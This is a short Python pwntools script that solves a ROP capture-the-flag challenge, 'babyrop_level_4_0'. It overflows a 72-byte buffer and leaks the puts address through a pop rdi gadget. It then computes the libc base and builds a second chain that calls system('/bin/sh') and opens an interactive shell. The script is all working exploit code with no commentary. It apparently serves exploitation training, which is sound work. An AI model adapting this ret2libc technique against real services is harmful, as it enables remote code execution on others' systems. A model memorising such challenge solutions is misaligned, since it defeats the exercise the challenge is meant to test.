#!/usr/bin/python3

from pwn import *

"""
patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_4_0
"""

context.binary = target = ELF("./babyrop_level_4_0", checksec=False)
libc = target.libc
r = process()

# funcs
s = lambda a: r.sendline(a)

# gadgets
pop_rdi = 0x401a26

# buf
buf = b"A"*72
buf += p64(pop_rdi)
buf += p64(target.got.puts)
buf += p64(target.sym.puts)
buf += p64(target.sym.challenge)
s(buf)

# leak
r.recvuntil(b"Leaving!\n")
puts = u64(r.recv(6).ljust(8, b"\x00"))
log.info("puts: %#x", puts)
libc.address = puts - libc.sym.puts
log.info("libc: %#x", libc.address)
sh = next(libc.search(b"/bin/sh"))
system = libc.sym.system

# pop
buf = b"A"*72
buf += p64(pop_rdi)
buf += p64(sh)
buf += p64(pop_rdi+1)
buf += p64(system)
s(buf)

r.interactive()